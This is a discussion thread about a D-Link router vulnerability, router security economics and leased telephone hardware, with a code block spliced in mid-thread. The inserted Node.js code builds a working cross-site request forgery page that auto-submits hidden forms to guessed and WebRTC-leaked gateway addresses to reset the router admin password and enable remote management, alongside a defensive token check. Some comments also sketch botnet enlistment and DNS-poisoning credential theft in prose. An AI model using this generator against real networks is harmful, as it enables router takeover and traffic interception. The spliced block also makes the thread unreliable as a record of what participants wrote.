by dangus 2452 days ago
Until consumers are willing to spend on subscription services to keep devices up-to-date, new hardware is the de facto method of paying for software development work.

Of course, in reality, this CVE seems almost un-exploitable in the wild, anyway. How will an exploiter get to the login page in the first place? They'd have to know your network password and be in your physical vicinity, or your ISP would have to send traffic to your router's login page from the Internet.

So they'd have to physically drive around looking for these three specific D-Link routers.

And then what would they get out of a successful exploit? Access to your network's traffic and unprotected file shares (most people don't even have any file shares), and even that level of access will be rather useless for getting important information like bank credentials (protected by HTTPS).

Am I wrong about any of this?

A lot of non-technical people use old Android phones, old printers, etc, and never experience any serious security breach. Some of them do experience a security breach, but it's far more likely to happen in a social exploit (phishing, whaling, etc) or institutional breach (your reused password being breached from a database hack of a popular website). In a lot of ways, ignorance is bliss.

12 comments

>Of course, in reality, this CVE seems almost un-exploitable in the wild, anyway. How will an exploiter get to the login page in the first place? They'd have to know your network password and be in your physical vicinity, or your ISP would have to send traffic to your router's login page from the Internet.

Nope. Not at all. Most router attacks these days are malicious JavaScript (like in ads and trackers) that sends HTTP requests to the router from the user's own web browser (already inside the network). No proximity access is needed.

https://arstechnica.com/information-technology/2019/07/websi...

Would this not also require some sort of exploitable CORS vulnerability?
CORS prevents the JS from seeing the result but it doesn't prevent the sending of the request.

This is one of the reasons my internal network is not 192.168.1.1/24 and the router is not 192.168.1.1.

> This is one of the reasons my internal network is not 192.168.1.1/24 and the router is not 192.168.1.1.

Do you also disable WebRTC on all clients on your network? An attacker (or script) may be foiled by your non-standard gateway network, but your work in obfuscating the router is wasted if they can get at your client IP address.

Doesn't CORS generally send an OPTIONS request first to see if the target site even allows the requests, thus preventing this? That's what I've seen when trying to work around browser CORS limitations.
Only for AJAX requests that are not "simple", that is, requests that cannot be sent without JavaScript. The sending of this OPTIONS request is referred to as a pre-flight. A more thorough description is at https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS
You can also just do a normal form post request into an invisible iframe that is generated by the attacker's javascript.
You can submit forms without CORS as long as there is no CSRF protection. I don't know what CSRF protection is being used.
Depends on the attack and the vulnerability. The article does say this:

> The attacks work when routers use weak administrative passwords and are vulnerable to CSRF attacks.

Which implies that a cross site request is being made. So e.g. you put a hidden form in a netf1ix.com page whose action is at some URL on the router. The user ends up accidentally posting data to that URL which is not affected by CORS and same-origin.

Normal form posts don't require pre-flight requests. DNS rebinding attacks can be used too.
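The CSRF/CORS mechanics argued over in the replies above, plus the point about a non-standard gateway address being undone by a WebRTC leak, as an added example. This is not code from the thread, from the Ars Technica article, or from D-Link: it models a simple (non-pre-flighted) request classifier, the attacker's auto-submitting hidden form, and the Origin-plus-token check a router would need on its side. The router path `/tools_admin.cgi`, the form field names, the `csrf_token` parameter, the session object and the leaked client address are all hypothetical. It runs under Node.js with no network access.

```javascript
'use strict';
// Added example, not from the thread or any vendor firmware. CORS only hides
// the response from the attacker's page; it does not stop the browser from
// sending a cross-origin form POST to a LAN router, so the router needs its
// own CSRF defence. Router path, field names and session are hypothetical.

// CORS-safelisted ("simple") request rules as documented on MDN: only these
// methods, only these request headers, and only these Content-Type values
// are sent without an OPTIONS pre-flight. Anything else is pre-flighted, and
// a router that never answers the pre-flight never sees the real request.
const SIMPLE_METHODS = new Set(['GET', 'HEAD', 'POST']);
const SIMPLE_HEADERS = new Set(['accept', 'accept-language', 'content-language', 'content-type']);
const SIMPLE_CONTENT_TYPES = new Set([
  'application/x-www-form-urlencoded',
  'multipart/form-data',
  'text/plain',
]);

// True if a fetch()/XHR with these parameters goes out with no pre-flight.
// The attacker still cannot read the response, but the router processes it.
function isSimpleRequest(method, headers) {
  if (!SIMPLE_METHODS.has(method.toUpperCase())) return false;
  for (const [name, value] of Object.entries(headers)) {
    const n = name.toLowerCase();
    if (!SIMPLE_HEADERS.has(n)) return false;
    if (n === 'content-type') {
      const mime = String(value).split(';')[0].trim().toLowerCase();
      if (!SIMPLE_CONTENT_TYPES.has(mime)) return false;
    }
  }
  return true;
}

// Gateway addresses worth trying: the usual defaults plus, if a WebRTC leak
// revealed the victim's LAN address, the .1 and .254 hosts of that /24.
// This is why moving off 192.168.1.1 alone buys little.
function gatewayCandidates(leakedClientIp) {
  const cands = ['192.168.0.1', '192.168.1.1', '10.0.0.1'];
  if (leakedClientIp) {
    const prefix = leakedClientIp.split('.').slice(0, 3).join('.');
    cands.push(`${prefix}.1`, `${prefix}.254`);
  }
  return [...new Set(cands)];
}

// The attacker's page: one hidden form per candidate gateway, each targeting
// an invisible iframe and auto-submitted. A plain form POST uses the
// urlencoded Content-Type, i.e. a simple request, so no pre-flight happens;
// a router session cookie without SameSite, or cached HTTP Basic credentials,
// is attached by the browser automatically.
function buildCsrfPage(candidates, action, fields) {
  const inputs = Object.entries(fields)
    .map(([k, v]) => `<input type="hidden" name="${k}" value="${v}">`)
    .join('');
  const forms = candidates
    .map((ip, i) =>
      `<iframe name="f${i}" style="display:none"></iframe>` +
      `<form method="POST" action="http://${ip}${action}" target="f${i}">${inputs}</form>`)
    .join('\n');
  const submit = '<script>document.querySelectorAll("form").forEach(f => f.submit());</script>';
  return `<html><body>\n${forms}\n${submit}\n</body></html>`;
}

// Router-side defence for a state-changing request: reject when the browser
// reports a foreign Origin, and always require the per-session CSRF token
// (Origin is absent on some older browsers, so the token check must never
// be skipped). Neither check has anything to do with CORS.
function routerAcceptsRequest(headers, body, session) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  if (h.origin !== undefined && h.origin !== session.selfOrigin) return false;
  return typeof body.csrf_token === 'string' && body.csrf_token === session.csrfToken;
}

// Demo with constructed values (leaked client address is made up).
console.log(buildCsrfPage(gatewayCandidates('192.168.37.42'), '/tools_admin.cgi',
  { admin_password: 'pwned', remote_admin: 'enable' }));
console.log('urlencoded form POST is simple:',
  isSimpleRequest('POST', { 'Content-Type': 'application/x-www-form-urlencoded' }));
console.log('JSON POST is simple:',
  isSimpleRequest('POST', { 'Content-Type': 'application/json' }));
```

The generated page is what a malicious ad would carry: no fetch() call, no pre-flight, and nothing for the router's CORS policy to decide. `routerAcceptsRequest` shows the two checks that actually stop it, and the Origin comparison also covers the DNS-rebinding variant, since a rebound hostname still yields an Origin that is not the router's own.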
Until consumers are willing to spend on subscription services...

You cannot shift a Gresham's Law race-to-the-bottom dynamic by insisting on consumer (or producer) willpower. You've got to enforce a floor.

In other consumer (and industrial) products, this has tended to happen through the combined mechanisms of strict liability, certification, and independent inspection (in specific cases).

Where manufacturers, or as seems more likely given the industry concentration around sales points, retailers, are liable for the consequences of unfit-for-purpose devices and services, a reasonable set of minimum requirements (including life-of-product and update requirements) can be specified, then you might see a shift to some mix of time-of-sale plus subscription service pricing and payment models.

More likely you'll see devices bundled with services (which sometimes happens), though preferably in a far more user-friendly basis than is presently the case (e.g., cable service set-top boxes).

There's actually a long history of leased-equipment business in the IT sector, most notably as pioneered by IBM in the 1950s and 1960s.

As soon as warranty/support expires, the device must be free for DRM/reverse-engineering. This will incentivize manufacturers to offer longer support.

Edit: Rather they should actually provide the spec, drivers etc

As support expires or EOL, the manufacturer should be forced to release their firmware code to ensure older devices can be patched, if they want to keep operating and selling new devices. This requires legislation though.
There are a lot of routers using GPL code that have open source firmware available (ddwrt,openwrt,tomato,etc.) I think once support for a device ends it should be mandated that the company release the source code for future development.

There is a worrying increase in the number of IoT devices that will remain forever unpatched due to the (cheap overseas) manufacturers never updating them or ending support for them.

Make that one year before ending support, so there is both time to prepare and incentive to open source early.
Ma Bell had been leasing telephones since the days of Alexander Graham Bell. In fact you weren't allowed to use any telephone except one leased from your telco until the breakup of the Bell System in the 80s.

Not sure that is what we want to go back to.

There were definitely problems and abuses with the model.

But the hardware itself was robust and reliable.

Remember: "We don’t care. We don’t have to. We’re the Phone Company"

Fake commercial on Saturday Night Season 2 Episode 1.

(It wasn't called Saturday Night Live until later.)

I find the story of Walter Shaw Sr. even more instructive.

Independent inventor convicted and gaoled by AT&T for "misdemeanor attachment", the crime of attaching non-AT&T equipment to AT&T's phone network.

https://en.wikipedia.org/wiki/Walter_L._Shaw

More on this in the first bit of "The Inventor and the Thief" on Snap Judgement:

https://www.wnycstudios.org/podcasts/snapjudgment/episodes/l...

Because the hardware didn't do much of anything!
Contrast Minitel, a videotext online system provided by the French government phone monopoly Postes, Télégraphes et Téléphones in 1980.

https://en.wikipedia.org/wiki/Minitel

See also the Charter lawsuit where it was revealed that Charter was renting very old equipment to their customers for years and didn't care.
That's where the minimum standards aspect comes in. The problem of noncompetitive monopolies failing to innovate and actively quashing independent inventors (see: Walter Shaw, Sr., amongst many others) is a risk of this approach.
AT&T didn't just come out and install a newer telephone because they had a newer model. If the equipment is fit for the service why replace it?
If you rent a $100 device at $10 a month for 10 years you end up paying $1200 and still not owning it.

I can see why consumers and consumer advocate groups don’t like this.

The customer should always have the option to buy their own hardware - that's to me something that was fought for (and won) with Carterphone
AT&T later in its history, 1960s - 1970s, offered the option of uplines (touch-tone, "Streamline", "Princess", and eventually Mickey Mouse telephones) as service upgrades. So there wasn't no interest in innovation, though I'd agree with the general view that the interest was low.
None of those were real technical improvements over the 500/2500 set however, they were upgrades designed to please the customer aesthetically.

Meaning, all of those sets performed more or less (in some cases less, specifically in certain special service applications) identically to a 2500/500, and at least one of those was a 2500 in a mouse shaped box.

Touch-Tone was actually a value add for the telco because it reduced register holding times in crossbar switches, and could reduce the amount of common control hardware needed, yet they still charged more for it (and the service too).

(Also, I think you mean trimline not streamline)

I should have said they were renting very old and inadequate equipment; it wasn't fine and they knew it.
And most consumers probably lease their routers through their ISP as modem/WiFi router combos, which essentially remain supported and updated by the ISP.

If we alternatively enforce a floor on security updates for user-purchased routers, let’s say we require security updates for the physical lifespan of the device (10 years?), they will be baked into the price of the device in some way, and I’m not sure the majority of home router customers who essentially look to spend around $20-40 will be willing to bear that cost.

An example of that in action would be purchasing a business SKU laptop compared to a consumer one, and taking a look at the length of driver support.

Most routers I've seen have a setting to enable "remote management". The DIR 655 does (see pg. 75 of its manual). If you have enabled that, then its login page is accessible via the Internet.

Many small businesses not only have unprotected file shares, but also have remote admin turned on so that their IT person can administer the router remotely (as silly as it is). I saw this so many times when I worked in IT. People make all sorts of assumptions about LAN privacy when setting up their network and devices.

As others pointed out, JavaScript can try to access stuff, but even more than that, the 400 apps on your phone, the 50 on your Mac and all your Steam games on your PC all have full network access that JavaScript in the browser does not have. They can access every port, send corrupted packets, and scan your entire network for exploitable devices.
You can use Javascript in an ad to make the browser connect to the internal IP address, which often is something like 192.168.1.1 and then once you’re in you can add the device to a botnet and sell its bandwidth or reroute its traffic.
I just fundamentally don't think a subscription service is fair here. After all, users are paying for the fixing of errors that shouldn't have been there to begin with. It's not the fixing of problems that are newly created but the fixing of defects that were there all along. Plus, the incentive here is backwards; in the most degenerate case, companies are incentivized to sell things as buggy as possible in order to sell the most bug fix subscriptions possible.
One solution would be to force the source code of non supported devices to be released (by law) so that third parties could be paid by individuals to update and patch them as long as there is a market.
> Until consumers are willing to spend on subscription services...

Ok, I’m willing. Where do I sign up?

Which manufacturers are offering this service for residential grade equipment?

Eero doesn't charge for updates, but they do have a subscription service for value-add services that cost them money, and have a pretty good track record of pushing automatic updates.
There is none. Everyone should have a Meraki security appliance in their home.
Dear lord.
Until manufacturers are liable for the damage they cause to security, and for data loss events for consumers, manufacturers will continue to have an unrealistic planned obsolescence model (12 months should never be the expected life span of a router) to force consumers to continually buy new hardware.
I see your point but I overpay for the iPhone I’m typing this on partly for that upgrade service. It is also something I appreciate about the Tesla as opposed to every other car I’ve ever had.
Why can't an attacker with router access poison the DNS, redirecting a bank address to the router itself with a fake cert, and duplication of the login screen and steal credentials that way? (Or probably better, steal online MUA [ie email] credentials).

I guess 2FA might block them, but if it were a typed in code you could still get it.

Or manufacturers can stop making "smart" devices just so they can fill them with ads and malware, leaving customers exposed to an unlimited number of threats.

It's not like they're just "giving you the choice" either. TV makers have already started completely removing non-smart TVs from their line-ups for instance.

I don't want a smart TV. If I want my TV to be smart, I'll buy a $50-$100 set top box I can upgrade in 2-3 years and is probably significantly more secure. Meanwhile a "smart" TV I will keep for 10+ years, but won't receive updates even for 20% of its lifecycle.